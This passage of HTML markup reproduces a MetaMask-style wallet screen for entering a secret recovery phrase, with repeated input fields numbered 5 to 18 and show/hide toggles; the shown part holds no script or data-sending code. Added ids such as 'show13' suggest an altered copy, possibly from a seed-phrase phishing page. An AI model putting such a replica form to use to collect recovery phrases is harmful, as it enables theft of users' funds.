                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-4" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">5.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-4" type="text" dir="auto" data-testid="import-srp__srp-word-4" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-4-checkbox" type="checkbox" data-testid="import-srp__srp-word-4-checkbox">
                                       <label for="import-srp__srp-word-4-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-5" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">6.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-5" type="text" dir="auto" data-testid="import-srp__srp-word-5" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-5-checkbox" type="checkbox" data-testid="import-srp__srp-word-5-checkbox">
                                       <label for="import-srp__srp-word-5-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-6" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">7.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-6" type="text" dir="auto" data-testid="import-srp__srp-word-6" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-6-checkbox" type="checkbox" data-testid="import-srp__srp-word-6-checkbox">
                                       <label for="import-srp__srp-word-6-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-7" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">8.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-7" type="text" dir="auto" data-testid="import-srp__srp-word-7" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-7-checkbox" type="checkbox" data-testid="import-srp__srp-word-7-checkbox">
                                       <label for="import-srp__srp-word-7-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-8" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">9.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-8" type="text" dir="auto" data-testid="import-srp__srp-word-8" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-8-checkbox" type="checkbox" data-testid="import-srp__srp-word-8-checkbox">
                                       <label for="import-srp__srp-word-8-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-9" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">10.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-9" type="text" dir="auto" data-testid="import-srp__srp-word-9" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-9-checkbox" type="checkbox" data-testid="import-srp__srp-word-9-checkbox">
                                       <label for="import-srp__srp-word-9-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-10" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">11.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-10" type="text" dir="auto" data-testid="import-srp__srp-word-10" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-10-checkbox" type="checkbox" data-testid="import-srp__srp-word-10-checkbox">
                                       <label for="import-srp__srp-word-10-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-11" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">12.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-11" type="text" dir="auto" data-testid="import-srp__srp-word-11" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-11-checkbox" type="checkbox" data-testid="import-srp__srp-word-11-checkbox">
                                       <label for="import-srp__srp-word-11-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show13">
                                    <label for="import-srp__srp-word-12" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">13.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-12" type="text" dir="auto" data-testid="import-srp__srp-word-12" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-12-checkbox" type="checkbox" data-testid="import-srp__srp-word-12-checkbox">
                                       <label for="import-srp__srp-word-12-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show14">
                                    <label for="import-srp__srp-word-13" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">14.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-13" type="text" dir="auto" data-testid="import-srp__srp-word-13" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-13-checkbox" type="checkbox" data-testid="import-srp__srp-word-13-checkbox">
                                       <label for="import-srp__srp-word-13-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 
                                 <div class="import-srp__srp-word" id="show15">
                                    <label for="import-srp__srp-word-14" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">15.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-14" type="text" dir="auto" data-testid="import-srp__srp-word-14" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-14-checkbox" type="checkbox" data-testid="import-srp__srp-word-14-checkbox">
                                       <label for="import-srp__srp-word-14-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show16">
                                    <label for="import-srp__srp-word-15" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">16.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-15" type="text" dir="auto" data-testid="import-srp__srp-word-15" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-15-checkbox" type="checkbox" data-testid="import-srp__srp-word-15-checkbox">
                                       <label for="import-srp__srp-word-15-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show17">
                                    <label for="import-srp__srp-word-16" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">17.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-16" type="text" dir="auto" data-testid="import-srp__srp-word-16" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-16-checkbox" type="checkbox" data-testid="import-srp__srp-word-16-checkbox">
                                       <label for="import-srp__srp-word-16-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show18">
                                    <label for="import-srp__srp-word-17" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">18.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-17" type="text" dir="auto" data-testid="import-srp__srp-word-17" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-17-checkbox" type="checkbox" data-testid="import-srp__srp-word-17-checkbox">
                                       <label for="import-srp__srp-word-17-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
